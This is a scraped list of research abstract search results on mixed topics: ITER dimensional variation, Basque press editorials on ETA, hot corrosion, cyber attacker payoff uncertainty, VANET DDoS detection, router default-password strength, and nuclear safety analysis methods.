cross-correlation functions, auto- and cross-spectrums, transfer function

  8. Methodology for dimensional variation analysis of ITER integrated systems

    International Nuclear Information System (INIS)

    Fuentes, F. Javier; Trouvé, Vincent; Cordier, Jean-Jacques; Reich, Jens

    2016-01-01

    Highlights: • Tokamak dimensional management methodology, based on 3D variation analysis, is presented. • Dimensional Variation Model implementation workflow is described. • Methodology phases are described in detail. The application of this methodology to the tolerance analysis of ITER Vacuum Vessel is presented. • Dimensional studies are a valuable tool for the assessment of Tokamak PCR (Project Change Requests), DR (Deviation Requests) and NCR (Non-Conformance Reports). - Abstract: The ITER machine consists of a large number of complex systems highly integrated, with critical functional requirements and reduced design clearances to minimize the impact in cost and performances. Tolerances and assembly accuracies in critical areas could have a serious impact in the final performances, compromising the machine assembly and plasma operation. The management of tolerances allocated to part manufacture and assembly processes, as well as the control of potential deviations and early mitigation of non-compliances with the technical requirements, is a critical activity on the project life cycle. A 3D tolerance simulation analysis of ITER Tokamak machine has been developed based on 3DCS dedicated software. This integrated dimensional variation model is representative of Tokamak manufacturing functional tolerances and assembly processes, predicting accurate values for the amount of variation on critical areas. This paper describes the detailed methodology to implement and update the Tokamak Dimensional Variation Model. The model is managed at system level. The methodology phases are illustrated by its application to the Vacuum Vessel (VV), considering the status of maturity of VV dimensional variation model. The following topics are described in this paper: • Model description and constraints. • Model implementation workflow. • Management of input and output data. • Statistical analysis and risk assessment. The management of the integration studies based on

  9. Methodology for dimensional variation analysis of ITER integrated systems

    Energy Technology Data Exchange (ETDEWEB)

    Fuentes, F. Javier, E-mail: FranciscoJavier.Fuentes@iter.org [ITER Organization, Route de Vinon-sur-Verdon—CS 90046, 13067 St Paul-lez-Durance (France); Trouvé, Vincent [Assystem Engineering & Operation Services, rue J-M Jacquard CS 60117, 84120 Pertuis (France); Cordier, Jean-Jacques; Reich, Jens [ITER Organization, Route de Vinon-sur-Verdon—CS 90046, 13067 St Paul-lez-Durance (France)

    2016-11-01

    Highlights: • Tokamak dimensional management methodology, based on 3D variation analysis, is presented. • Dimensional Variation Model implementation workflow is described. • Methodology phases are described in detail. The application of this methodology to the tolerance analysis of ITER Vacuum Vessel is presented. • Dimensional studies are a valuable tool for the assessment of Tokamak PCR (Project Change Requests), DR (Deviation Requests) and NCR (Non-Conformance Reports). - Abstract: The ITER machine consists of a large number of complex systems highly integrated, with critical functional requirements and reduced design clearances to minimize the impact in cost and performances. Tolerances and assembly accuracies in critical areas could have a serious impact in the final performances, compromising the machine assembly and plasma operation. The management of tolerances allocated to part manufacture and assembly processes, as well as the control of potential deviations and early mitigation of non-compliances with the technical requirements, is a critical activity on the project life cycle. A 3D tolerance simulation analysis of ITER Tokamak machine has been developed based on 3DCS dedicated software. This integrated dimensional variation model is representative of Tokamak manufacturing functional tolerances and assembly processes, predicting accurate values for the amount of variation on critical areas. This paper describes the detailed methodology to implement and update the Tokamak Dimensional Variation Model. The model is managed at system level. The methodology phases are illustrated by its application to the Vacuum Vessel (VV), considering the status of maturity of VV dimensional variation model. The following topics are described in this paper: • Model description and constraints. • Model implementation workflow. • Management of input and output data. • Statistical analysis and risk assessment. The management of the integration studies based on

  10. Terrorism in the Basque press (1990, 2000, 2008 and 2009. Analysis of newspaper editorials about ETA’s fatal attacks

    Directory of Open Access Journals (Sweden)

    José-María Caminos-Marcet, Ph.D.

    2013-01-01

    Full Text Available This article presents an analysis of the editorials published by the Basque press in 1990, 2000, 2008 and 2009, when ETA carried out fatal attacks. The objective is to examine the treatment given by the different Basque newspapers to terrorism in their most important opinion texts, which reflect their ideology. The initial hypothesis is that the editorial line used by the Basque press to address ETA’s attacks has changed remarkably during the analysed years, going from the virtual absence of editorials to the use of editorials as active instruments in the fight against violence. By 2009, the Basque press had finally defined its strategy to combat ETA’s terrorism, and this was perfectly reflected in their editorials.

  11. A multiple linear regression analysis of hot corrosion attack on a series of nickel base turbine alloys

    Science.gov (United States)

    Barrett, C. A.

    1985-01-01

    Multiple linear regression analysis was used to determine an equation for estimating hot corrosion attack for a series of Ni base cast turbine alloys. The U transform (i.e., 1/sin (% A/100) to the 1/2) was shown to give the best estimate of the dependent variable, y. A complete second degree equation is described for the centered" weight chemistries for the elements Cr, Al, Ti, Mo, W, Cb, Ta, and Co. In addition linear terms for the minor elements C, B, and Zr were added for a basic 47 term equation. The best reduced equation was determined by the stepwise selection method with essentially 13 terms. The Cr term was found to be the most important accounting for 60 percent of the explained variability hot corrosion attack.

  12. Propagating Mixed Uncertainties in Cyber Attacker Payoffs: Exploration of Two-Phase Monte Carlo Sampling and Probability Bounds Analysis

    Energy Technology Data Exchange (ETDEWEB)

    Chatterjee, Samrat; Tipireddy, Ramakrishna; Oster, Matthew R.; Halappanavar, Mahantesh

    2016-09-16

    Securing cyber-systems on a continual basis against a multitude of adverse events is a challenging undertaking. Game-theoretic approaches, that model actions of strategic decision-makers, are increasingly being applied to address cybersecurity resource allocation challenges. Such game-based models account for multiple player actions and represent cyber attacker payoffs mostly as point utility estimates. Since a cyber-attacker’s payoff generation mechanism is largely unknown, appropriate representation and propagation of uncertainty is a critical task. In this paper we expand on prior work and focus on operationalizing the probabilistic uncertainty quantification framework, for a notional cyber system, through: 1) representation of uncertain attacker and system-related modeling variables as probability distributions and mathematical intervals, and 2) exploration of uncertainty propagation techniques including two-phase Monte Carlo sampling and probability bounds analysis.

  13. A Multivariant Stream Analysis Approach to Detect and Mitigate DDoS Attacks in Vehicular Ad Hoc Networks

    Directory of Open Access Journals (Sweden)

    Raenu Kolandaisamy

    2018-01-01

    Full Text Available Vehicular Ad Hoc Networks (VANETs are rapidly gaining attention due to the diversity of services that they can potentially offer. However, VANET communication is vulnerable to numerous security threats such as Distributed Denial of Service (DDoS attacks. Dealing with these attacks in VANET is a challenging problem. Most of the existing DDoS detection techniques suffer from poor accuracy and high computational overhead. To cope with these problems, we present a novel Multivariant Stream Analysis (MVSA approach. The proposed MVSA approach maintains the multiple stages for detection DDoS attack in network. The Multivariant Stream Analysis gives unique result based on the Vehicle-to-Vehicle communication through Road Side Unit. The approach observes the traffic in different situations and time frames and maintains different rules for various traffic classes in various time windows. The performance of the MVSA is evaluated using an NS2 simulator. Simulation results demonstrate the effectiveness and efficiency of the MVSA regarding detection accuracy and reducing the impact on VANET communication.

  14. Development of Audit Calculation Methodology for RIA Safety Analysis

    Energy Technology Data Exchange (ETDEWEB)

    Lee, Joosuk; Kim, Gwanyoung; Woo, Swengwoong [Korea Institute of Nuclear Safety, Daejeon (Korea, Republic of)

    2015-05-15

    The interim criteria contain more stringent limits than previous ones. For example, pellet-to-cladding mechanical interaction(PCMI) was introduced as a new failure criteria. And both short-term (e.g. fuel-to coolant interaction, rod burst) and long-term(e.g., fuel rod ballooning, flow blockage) phenomena should be addressed for core coolability assurance. For dose calculations, transient-induced fission gas release has to be accounted additionally. Traditionally, the approved RIA analysis methodologies for licensing application are developed based on conservative approach. But newly introduced safety criteria tend to reduce the margins to the criteria. Thereby, licensees are trying to improve the margins by utilizing a less conservative approach. In this situation, to cope with this trend, a new audit calculation methodology needs to be developed. In this paper, the new methodology, which is currently under developing in KINS, was introduced. For the development of audit calculation methodology of RIA safety analysis based on the realistic evaluation approach, preliminary calculation by utilizing the best estimate code has been done on the initial core of APR1400. Followings are main conclusions. - With the assumption of single full-strength control rod ejection in HZP condition, rod failure due to PCMI is not predicted. - And coolability can be assured in view of entalphy and fuel melting. - But, rod failure due to DNBR is expected, and there is possibility of fuel failure at the rated power conditions also.

  15. A continuum damage analysis of hydrogen attack in 2.25 Cr-1Mo vessel

    DEFF Research Database (Denmark)

    van der Burg, M.W.D.; van der Giessen, E.; Tvergaard, Viggo

    1998-01-01

    A micromechanically based continuum damage model is presented to analyze the stress, temperature and hydrogen pressure dependent material degradation process termed hydrogen attack, inside a pressure vessel. Hydrogen attack (HA) is the damage process of grain boundary facets due to a chemical...... reaction of carbides with hydrogen, thus forming cavities with high pressure methane gas. Driven by the methane gas pressure, the cavities grow, while remote tensile stresses can significantly enhance the cavitation rate. The damage model gives the strain-rate and damage rate as a function...... of the temperature, hydrogen pressure and applied stresses. The model is applied to study HA in a vessel wall, where nonuniform distributions of hydrogen pressure, temperature and stresses result in a nonuniform damage distribution over the vessel wall. Stresses inside the vessel wall first tend to accelerate...

  16. Analysis Of Default Passwords In Routers Against Brute-Force Attack

    OpenAIRE

    Mohammed Farik; ABM Shawkat Ali

    2015-01-01

    Abstract Password authentication is the main means of access control on network routers and router manufacturers provide a default password for initial login to the router. While there has been many publications regarding the minimum requirements of a good password how widely the manufacturers themselves are adhering to the minimum standards and whether these passwords can withstand brute-force attack are not widely known. The novelty of this research is that this is the first time default...

  17. Latest developments on safety analysis methodologies at the Juzbado plant

    International Nuclear Information System (INIS)

    Zurron-Cifuentes, Oscar; Ortiz-Trujillo, Diego; Blanco-Fernandez, Luis A.

    2010-01-01

    Over the last few years the Juzbado Plant has developed and implemented several analysis methodologies to cope with specific issues regarding safety management. This paper describes the three most outstanding of them, so as to say, the Integrated Safety Analysis (ISA) project, the adaptation of the MARSSIM methodology for characterization surveys of radioactive contamination spots, and the programme for the Systematic Review of the Operational Conditions of the Safety Systems (SROCSS). Several reasons motivated the decision to implement such methodologies, such as Regulator requirements, operational experience and of course, the strong commitment of ENUSA to maintain the highest standards of nuclear industry on all the safety relevant activities. In this context, since 2004 ENUSA is undertaking the ISA project, which consists on a systematic examination of plant's processes, equipment, structures and personnel activities to ensure that all relevant hazards that could result in unacceptable consequences have been adequately evaluated and the appropriate protective measures have been identified. On the other hand and within the framework of a current programme to ensure the absence of radioactive contamination spots on unintended areas, the MARSSIM methodology is being applied as a tool to conduct the radiation surveys and investigation of potentially contaminated areas. Finally, the SROCSS programme was initiated earlier this year 2009 to assess the actual operating conditions of all the systems with safety relevance, aiming to identify either potential non-conformities or areas for improvement in order to ensure their high performance after years of operation. The following paragraphs describe the key points related to these three methodologies as well as an outline of the results obtained so far. (authors)

  18. In Their Own Words? Methodological Considerations in the Analysis of Terrorist Autobiographies

    Directory of Open Access Journals (Sweden)

    Mary Beth Altier

    2012-01-01

    Full Text Available Despite the growth of terrorism literature in the aftermath of the 9/11 attacks, there remain several methodological challenges to studying certain aspects of terrorism. This is perhaps most evident in attempts to uncover the attitudes, motivations, and intentions of individuals engaged in violent extremism and how they are sometimes expressed in problematic behavior. Such challenges invariably stem from the fact that terrorists and the organizations to which they belong represent clandestine populations engaged in illegal activity. Unsurprisingly, these qualities make it difficult for the researcher to identify and locate willing subjects of study—let alone a representative sample. In this research note, we suggest the systematic analysis of terrorist autobiographies offers a promising means of investigating difficult-to-study areas of terrorism-related phenomena. Investigation of autobiographical accounts not only offers additional data points for the study of individual psychological issues, but also provides valuable perspectives on the internal structures, processes, and dynamics of terrorist organizations more broadly. Moreover, given most autobiographies cover critical events and personal experiences across the life course, they provide a unique lens into how terrorists perceive their world and insight into their decision-making processes. We support our advocacy of this approach by highlighting its methodological strengths and shortcomings.

  19. Application of human reliability analysis methodology of second generation

    International Nuclear Information System (INIS)

    Ruiz S, T. de J.; Nelson E, P. F.

    2009-10-01

    The human reliability analysis (HRA) is a very important part of probabilistic safety analysis. The main contribution of HRA in nuclear power plants is the identification and characterization of the issues that are brought together for an error occurring in the human tasks that occur under normal operation conditions and those made after abnormal event. Additionally, the analysis of various accidents in history, it was found that the human component has been a contributing factor in the cause. Because of need to understand the forms and probability of human error in the 60 decade begins with the collection of generic data that result in the development of the first generation of HRA methodologies. Subsequently develop methods to include in their models additional performance shaping factors and the interaction between them. So by the 90 mid, comes what is considered the second generation methodologies. Among these is the methodology A Technique for Human Event Analysis (ATHEANA). The application of this method in a generic human failure event, it is interesting because it includes in its modeling commission error, the additional deviations quantification to nominal scenario considered in the accident sequence of probabilistic safety analysis and, for this event the dependency actions evaluation. That is, the generic human failure event was required first independent evaluation of the two related human failure events . So the gathering of the new human error probabilities involves the nominal scenario quantification and cases of significant deviations considered by the potential impact on analyzed human failure events. Like probabilistic safety analysis, with the analysis of the sequences were extracted factors more specific with the highest contribution in the human error probabilities. (Author)

  20. Methodology, Measurement and Analysis of Flow Table Update Characteristics in Hardware OpenFlow Switches

    KAUST Repository

    Kuźniar, Maciej; Pereší ni, Peter; Kostić, Dejan; Canini, Marco

    2018-01-01

    and performance characteristics is essential for ensuring successful and safe deployments.We propose a systematic methodology for SDN switch performance analysis and devise a series of experiments based on this methodology. The methodology relies on sending a

  1. Comparative Analysis of Return of Serve Comparative Analysis of Return of Serve as Counter- as Counter-attack in Modern Tennis attack in Modern Tennis attack in Modern Tennis

    Directory of Open Access Journals (Sweden)

    Petru Eugen MERGHEŞ

    2017-02-01

    Full Text Available High performance modern tennis is characterised by high dynamism, speed in thinking and action, precision and high technical and tactical skills. In this study, we used direct observation and statistical recording of nine matches during two competition years in the tennis players Roger Federer, Rafael Nadal and Andre Agassi. In these tennis players, we studied mainly the return of serve, one of the most important shots in tennis, together with serve, as first shots in a point. We have chosen the three tennis players because they are the best example of return of serve as shown by the matches recorded and interpreted. The study we have carried out shows that return of serve makes Agassi a winner in most matches. The high percentage in Federer’s serves makes his adversaries have a lower percentage in return of serve, which prevents them to win against his serve. High percentage in return of serve results in more points on the adversary’s serve and an opportunity to start the offensive point. After comparing the three tennis players mentioned above, we can see that the highest percentage of points won on return of serve belongs to Agassi, which ranks him among the best return of serve tennis players in the world. The tennis player with the highest percentage in return of service is the one who wins the match, which shows, once again, the importance of the return of serve. Return of serve can be a strong counter-attack weapon if used at its highest level.

  2. Snapshot analysis for rhodium fixed incore detector using BEACON methodology

    International Nuclear Information System (INIS)

    Cha, Kyoon Ho; Choi, Yu Sun; Lee, Eun Ki; Park, Moon Ghu; Morita, Toshio; Heibel, Michael D.

    2004-01-01

    The purpose of this report is to process the rhodium detector data of the Yonggwang nuclear unit 4 cycle 5 core for the measured power distribution by using the BEACON methodology. Rhodium snapshots of the YGN 4 cycle 5 have been analyzed by both BEACON/SPINOVA and CECOR to compare the results of both codes. By analyzing a large number of snapshots obtained during normal plant operation. Reviewing the results of this analysis, the BEACON/SPNOVA can be used for the snapshot analysis of Korean Standard Nuclear Power (KSNP) plants

  3. Interpretive Phenomenological Analysis: An Appropriate Methodology for Educational Research?

    Directory of Open Access Journals (Sweden)

    Edward John Noon

    2018-04-01

    Full Text Available Interpretive phenomenological analysis (IPA is a contemporary qualitative methodology, first developed by psychologist Jonathan Smith (1996. Whilst its roots are in psychology, it is increasingly being drawn upon by scholars in the human, social and health sciences (Charlick, Pincombe, McKellar, & Fielder, 2016. Despite this, IPA has received limited attention across educationalist literature. Drawing upon my experiences of using IPA to explore the barriers to the use of humour in the teaching of Childhood Studies (Noon, 2017, this paper will discuss its theoretical orientation, sampling and methods of data collection and analysis, before examining the strengths and weaknesses to IPA’s employment in educational research.

  4. A methodology for uncertainty analysis of reference equations of state

    DEFF Research Database (Denmark)

    Cheung, Howard; Frutiger, Jerome; Bell, Ian H.

    We present a detailed methodology for the uncertainty analysis of reference equations of state (EOS) based on Helmholtz energy. In recent years there has been an increased interest in uncertainties of property data and process models of thermal systems. In the literature there are various...... for uncertainty analysis is suggested as a tool for EOS. The uncertainties of the EOS properties are calculated from the experimental values and the EOS model structure through the parameter covariance matrix and subsequent linear error propagation. This allows reporting the uncertainty range (95% confidence...

  5. A methodology for strain-based fatigue reliability analysis

    International Nuclear Information System (INIS)

    Zhao, Y.X.

    2000-01-01

    A significant scatter of the cyclic stress-strain (CSS) responses should be noted for a nuclear reactor material, 1Cr18Ni9Ti pipe-weld metal. Existence of the scatter implies that a random cyclic strain applied history will be introduced under any of the loading modes even a deterministic loading history. A non-conservative evaluation might be given in the practice without considering the scatter. A methodology for strain-based fatigue reliability analysis, which has taken into account the scatter, is developed. The responses are approximately modeled by probability-based CSS curves of Ramberg-Osgood relation. The strain-life data are modeled, similarly, by probability-based strain-life curves of Coffin-Manson law. The reliability assessment is constructed by considering interference of the random fatigue strain applied and capacity histories. Probability density functions of the applied and capacity histories are analytically given. The methodology could be conveniently extrapolated to the case of deterministic CSS relation as the existent methods did. Non-conservative evaluation of the deterministic CSS relation and availability of present methodology have been indicated by an analysis of the material test results

  6. ASSESSMENT OF SEISMIC ANALYSIS METHODOLOGIES FOR DEEPLY EMBEDDED NPP STRUCTURES

    International Nuclear Information System (INIS)

    XU, J.; MILLER, C.; COSTANTINO, C.; HOFMAYER, C.; GRAVES, H. NRC.

    2005-01-01

    Several of the new generation nuclear power plant designs have structural configurations which are proposed to be deeply embedded. Since current seismic analysis methodologies have been applied to shallow embedded structures (e.g., ASCE 4 suggest that simple formulations may be used to model embedment effect when the depth of embedment is less than 30% of its foundation radius), the US Nuclear Regulatory Commission is sponsoring a program at the Brookhaven National Laboratory with the objective of investigating the extent to which procedures acceptable for shallow embedment depths are adequate for larger embedment depths. This paper presents the results of a study comparing the response spectra obtained from two of the more popular analysis methods for structural configurations varying from shallow embedment to complete embedment. A typical safety related structure embedded in a soil profile representative of a typical nuclear power plant site was utilized in the study and the depths of burial (DOB) considered range from 25-100% the height of the structure. Included in the paper are: (1) the description of a simplified analysis and a detailed approach for the SSI analyses of a structure with various DOB, (2) the comparison of the analysis results for the different DOBs between the two methods, and (3) the performance assessment of the analysis methodologies for SSI analyses of deeply embedded structures. The resulting assessment from this study has indicated that simplified methods may be capable of capturing the seismic response for much deeper embedded structures than would be normally allowed by the standard practice

  7. Practical In-Depth Analysis of IDS Alerts for Tracing and Identifying Potential Attackers on Darknet

    OpenAIRE

    Jungsuk Song; Younsu Lee; Jang-Won Choi; Joon-Min Gil; Jaekyung Han; Sang-Soo Choi

    2017-01-01

    The darknet (i.e., a set of unused IP addresses) is a very useful solution for observing the global trends of cyber threats and analyzing attack activities on the Internet. Since the darknet is not connected with real systems, in most cases, the incoming packets on the darknet (‘the darknet traffic’) do not contain a payload. This means that we are unable to get real malware from the darknet traffic. This situation makes it difficult for security experts (e.g., academic researchers, engineers...

  8. 3-D rod ejection analysis using a conservative methodology

    Energy Technology Data Exchange (ETDEWEB)

    Park, Min Ho; Park, Jin Woo; Park, Guen Tae; Um, Kil Sup; Ryu, Seok Hee; Lee, Jae Il; Choi, Tong Soo [KEPCO, Daejeon (Korea, Republic of)

    2016-05-15

    The point kinetics model which simplifies the core phenomena and physical specifications is used for the conventional rod ejection accident analysis. The point kinetics model is convenient to assume conservative core parameters but this simplification loses large amount of safety margin. The CHASER system couples the three-dimensional core neutron kinetics code ASTRA, the sub-channel analysis code THALES and the fuel performance analysis code FROST. The validation study for the CHASER system is addressed using the NEACRP three-dimensional PWR core transient benchmark problem. A series of conservative rod ejection analyses for the APR1400 type plant is performed for both hot full power (HFP) and hot zero power (HZP) conditions to determine the most limiting cases. The conservative rod ejection analysis methodology is designed to properly consider important phenomena and physical parameters.

  9. Methodological challenges in qualitative content analysis: A discussion paper.

    Science.gov (United States)

    Graneheim, Ulla H; Lindgren, Britt-Marie; Lundman, Berit

    2017-09-01

    This discussion paper is aimed to map content analysis in the qualitative paradigm and explore common methodological challenges. We discuss phenomenological descriptions of manifest content and hermeneutical interpretations of latent content. We demonstrate inductive, deductive, and abductive approaches to qualitative content analysis, and elaborate on the level of abstraction and degree of interpretation used in constructing categories, descriptive themes, and themes of meaning. With increased abstraction and interpretation comes an increased challenge to demonstrate the credibility and authenticity of the analysis. A key issue is to show the logic in how categories and themes are abstracted, interpreted, and connected to the aim and to each other. Qualitative content analysis is an autonomous method and can be used at varying levels of abstraction and interpretation. Copyright © 2017 Elsevier Ltd. All rights reserved.

  10. Biomass Thermogravimetric Analysis: Uncertainty Determination Methodology and Sampling Maps Generation

    Science.gov (United States)

    Pazó, Jose A.; Granada, Enrique; Saavedra, Ángeles; Eguía, Pablo; Collazo, Joaquín

    2010-01-01

    The objective of this study was to develop a methodology for the determination of the maximum sampling error and confidence intervals of thermal properties obtained from thermogravimetric analysis (TG), including moisture, volatile matter, fixed carbon and ash content. The sampling procedure of the TG analysis was of particular interest and was conducted with care. The results of the present study were compared to those of a prompt analysis, and a correlation between the mean values and maximum sampling errors of the methods were not observed. In general, low and acceptable levels of uncertainty and error were obtained, demonstrating that the properties evaluated by TG analysis were representative of the overall fuel composition. The accurate determination of the thermal properties of biomass with precise confidence intervals is of particular interest in energetic biomass applications. PMID:20717532

  11. Safety analysis methodologies for radioactive waste repositories in shallow ground

    International Nuclear Information System (INIS)

    1984-01-01

    The report is part of the IAEA Safety Series and is addressed to authorities and specialists responsible for or involved in planning, performing and/or reviewing safety assessments of shallow ground radioactive waste repositories. It discusses approaches that are applicable for safety analysis of a shallow ground repository. The methodologies, analysis techniques and models described are pertinent to the task of predicting the long-term performance of a shallow ground disposal system. They may be used during the processes of selection, confirmation and licensing of new sites and disposal systems or to evaluate the long-term consequences in the post-sealing phase of existing operating or inactive sites. The analysis may point out need for remedial action, or provide information to be used in deciding on the duration of surveillance. Safety analysis both general in nature and specific to a certain repository, site or design concept, are discussed, with emphasis on deterministic and probabilistic studies

  12. PROTECTION WORKS AGAINST WAVE ATTACKS IN THE HAOR AREAS OF BANGLADESH: ANALYSIS OF SUSTAINABILITY

    Directory of Open Access Journals (Sweden)

    M.K. Alam

    2010-12-01

    Full Text Available Haor is the local name of the saucer-shaped, naturally depressed areas of Bangladesh. There are 414 haors in the northeast region that comprise approximately 17% of the country. These areas are submerged under deep water from July to November due to the overflow of rivers and heavy rainfall, causing them to appear like seas with erosive waves. Recently, the wave attack has drastically increased because of de-plantation and changing cropping patterns to allow for more agricultural production. The local people, government and Non-Government Organisations (NGOs have tried many techniques to protect life and property against wave attacks. A cost comparison shows that Cement Concrete (CC blocks over geotextile on the slope embankment is a cost-effective, environment friendly and socially acceptable method to prevent loss of life and property. However, the design rules employed by the engineers are faulty because there is knowledge gap in the application of wave hydraulics among these professionals. As a result, damage frequently occurs and maintenance costs are increasing. This study explores the sustainability of the CC blocks used in the Haor areas by evaluating two case studies with the verification of available design rules.

  13. Comparative analysis as a basic research orientation: Key methodological problems

    Directory of Open Access Journals (Sweden)

    N P Narbut

    2015-12-01

    Full Text Available To date, the Sociological Laboratory of the Peoples’ Friendship University of Russia has accumulated a vast experience in the field of cross-cultural studies reflected in the publications based on the results of mass surveys conducted in Moscow, Maikop, Beijing, Guangzhou, Prague, Belgrade, and Pristina. However, these publications mainly focus on the comparisons of the empirical data rather than methodological and technical issues, that is why the aim of this article is to identify key problems of the comparative analysis in cross-cultural studies that become evident only if you conduct an empirical research yourself - from the first step of setting the problem and approving it by all the sides (countries involved to the last step of interpreting and comparing the data obtained. The authors are sure that no sociologist would ever doubt the necessity and importance of comparative analysis in the broadest sense of the word, but at the same time very few are ready to discuss its key methodological challenges and prefer to ignore them completely. We summarize problems of the comparative analysis in sociology as follows: (1 applying research techniques to the sample in another country - both in translating and adapting them to different social realities and worldview (in particular, the problematic status of standardization and qualitative approach; (2 choosing “right” respondents to question and relevant cases (cultures to study; (3 designing the research scheme, i.e. justifying the sequence of steps (what should go first - methodology or techniques; (4 accepting the procedures that are correct within one country for cross-cultural work (whether or not that is an appropriate choice.

  14. Analysis of gaming community using Soft System Methodology

    OpenAIRE

    Hurych, Jan

    2015-01-01

    This diploma thesis aims to analyse virtual gaming community and it's problems in case of community belonging to EU server of the game called World of Tanks. To solve these problems, Soft System Methodology by P. Checkland, is used. The thesis includes analysis of significance of gaming communities for the gaming industry as a whole. Gaming community is then defined as a soft system. There are 3 problems analysed in the practical part of the thesis using newer version of SSM. One iteration of...

  15. A development of containment performance analysis methodology using GOTHIC code

    Energy Technology Data Exchange (ETDEWEB)

    Lee, B. C.; Yoon, J. I. [Future and Challenge Company, Seoul (Korea, Republic of); Byun, C. S.; Lee, J. Y. [Korea Electric Power Research Institute, Taejon (Korea, Republic of); Lee, J. Y. [Seoul National University, Seoul (Korea, Republic of)

    2003-10-01

    In a circumstance that well-established containment pressure/temperature analysis code, CONTEMPT-LT treats the reactor containment as a single volume, this study introduces, as an alternative, the GOTHIC code for an usage on multi-compartmental containment performance analysis. With a developed GOTHIC methodology, its applicability is verified for containment performance analysis for Korean Nuclear Unit 1. The GOTHIC model for this plant is simply composed of 3 compartments including the reactor containment and RWST. In addition, the containment spray system and containment recirculation system are simulated. As a result of GOTHIC calculation, under the same assumptions and conditions as those in CONTEMPT-LT, the GOTHIC prediction shows a very good result; pressure and temperature transients including their peaks are nearly the same. It can be concluded that the GOTHIC could provide reasonable containment pressure and temperature responses if considering the inherent conservatism in CONTEMPT-LT code.

  16. A development of containment performance analysis methodology using GOTHIC code

    International Nuclear Information System (INIS)

    Lee, B. C.; Yoon, J. I.; Byun, C. S.; Lee, J. Y.; Lee, J. Y.

    2003-01-01

    In a circumstance that well-established containment pressure/temperature analysis code, CONTEMPT-LT treats the reactor containment as a single volume, this study introduces, as an alternative, the GOTHIC code for an usage on multi-compartmental containment performance analysis. With a developed GOTHIC methodology, its applicability is verified for containment performance analysis for Korean Nuclear Unit 1. The GOTHIC model for this plant is simply composed of 3 compartments including the reactor containment and RWST. In addition, the containment spray system and containment recirculation system are simulated. As a result of GOTHIC calculation, under the same assumptions and conditions as those in CONTEMPT-LT, the GOTHIC prediction shows a very good result; pressure and temperature transients including their peaks are nearly the same. It can be concluded that the GOTHIC could provide reasonable containment pressure and temperature responses if considering the inherent conservatism in CONTEMPT-LT code

  17. METHODOLOGY FOR ANALYSIS OF DECISION MAKING IN AIR NAVIGATION SYSTEM

    Directory of Open Access Journals (Sweden)

    Volodymyr Kharchenko

    2011-03-01

    Full Text Available Abstract. In the research of Air Navigation System as a complex socio-technical system the methodologyof analysis of human-operator's decision-making has been developed. The significance of individualpsychologicalfactors as well as the impact of socio-psychological factors on the professional activities of ahuman-operator during the flight situation development from normal to catastrophic were analyzed. On thebasis of the reflexive theory of bipolar choice the expected risks of decision-making by the Air NavigationSystem's operator influenced by external environment, previous experience and intentions were identified.The methods for analysis of decision-making by the human-operator of Air Navigation System usingstochastic networks have been developed.Keywords: Air Navigation System, bipolar choice, human operator, decision-making, expected risk, individualpsychologicalfactors, methodology of analysis, reflexive model, socio-psychological factors, stochastic network.

  18. Securing public transportation systems an integrated decision analysis framework for the prevention of terrorist attacks as example

    CERN Document Server

    Brauner, Florian

    2017-01-01

    Florian Brauner addresses the risk reduction effects of security measures (SecMe) as well as economic and social effects using terrorist threats in public transportation as use case. SecMe increase the level of security but cause interferences and restrictions for customers (e.g. privacy). This study identifies the interferences and analyzes the acceptance with an empirical survey of customers. A composite indicator for the acceptance of different SecMe is developed and integrated into a risk management framework for multi-criteria decision analysis achieving the right balance of risk reduction, costs, and social acceptance. Contents Assessment of Security Measures for Risk Management Measurement of Objective Effectiveness of Security Measures Against Terrorist Attacks Determination of Subjective Effects of Security Measures (Customer Acceptance Analysis) Cost Analysis of Security Measures Multi-Criteria Decision Support Systems Target Groups Scientists with Interest in Civil Security Research Providers and S...

  19. Impact modeling and prediction of attacks on cyber targets

    Science.gov (United States)

    Khalili, Aram; Michalk, Brian; Alford, Lee; Henney, Chris; Gilbert, Logan

    2010-04-01

    In most organizations, IT (information technology) infrastructure exists to support the organization's mission. The threat of cyber attacks poses risks to this mission. Current network security research focuses on the threat of cyber attacks to the organization's IT infrastructure; however, the risks to the overall mission are rarely analyzed or formalized. This connection of IT infrastructure to the organization's mission is often neglected or carried out ad-hoc. Our work bridges this gap and introduces analyses and formalisms to help organizations understand the mission risks they face from cyber attacks. Modeling an organization's mission vulnerability to cyber attacks requires a description of the IT infrastructure (network model), the organization mission (business model), and how the mission relies on IT resources (correlation model). With this information, proper analysis can show which cyber resources are of tactical importance in a cyber attack, i.e., controlling them enables a large range of cyber attacks. Such analysis also reveals which IT resources contribute most to the organization's mission, i.e., lack of control over them gravely affects the mission. These results can then be used to formulate IT security strategies and explore their trade-offs, which leads to better incident response. This paper presents our methodology for encoding IT infrastructure, organization mission and correlations, our analysis framework, as well as initial experimental results and conclusions.

  20. A powerful methodology for reactor vessel pressurized thermal shock analysis

    International Nuclear Information System (INIS)

    Boucau, J.; Mager, T.

    1994-01-01

    The recent operating experience of the Pressurized Water Reactor (PWR) Industry has focused increasing attention on the issue of reactor vessel pressurized thermal shock (PTS). More specifically, the review of the old WWER-type of reactors (WWER 440/230) has indicated a sensitive behaviour to neutron embrittlement. This led already to some remedial actions including safety injection water preheating or vessel annealing. Such measures are usually taken based on the analysis of a selected number of conservative PTS events. Consideration of all postulated cooldown events would draw attention to the impact of operator action and control system effects on reactor vessel PTS. Westinghouse has developed a methodology which couples event sequence analysis with probabilistic fracture mechanics analyses, to identify those events that are of primary concern for reactor vessel integrity. Operating experience is utilized to aid in defining the appropriate event sequences and event frequencies of occurrence for the evaluation. Once the event sequences of concern are identified, detailed deterministic thermal-hydraulic and structural evaluations can be performed to determine the conditions required to minimize the extension of postulated flaws or enhance flaw arrest in the reactor vessel. The results of these analyses can then be used to better define further modifications in vessel and plant system design and to operating procedures. The purpose of the present paper will be to describe this methodology and to show its benefits for decision making. (author). 1 ref., 3 figs

  1. Development of a heat exchanger root-cause analysis methodology

    International Nuclear Information System (INIS)

    Jarrel, D.B.

    1989-01-01

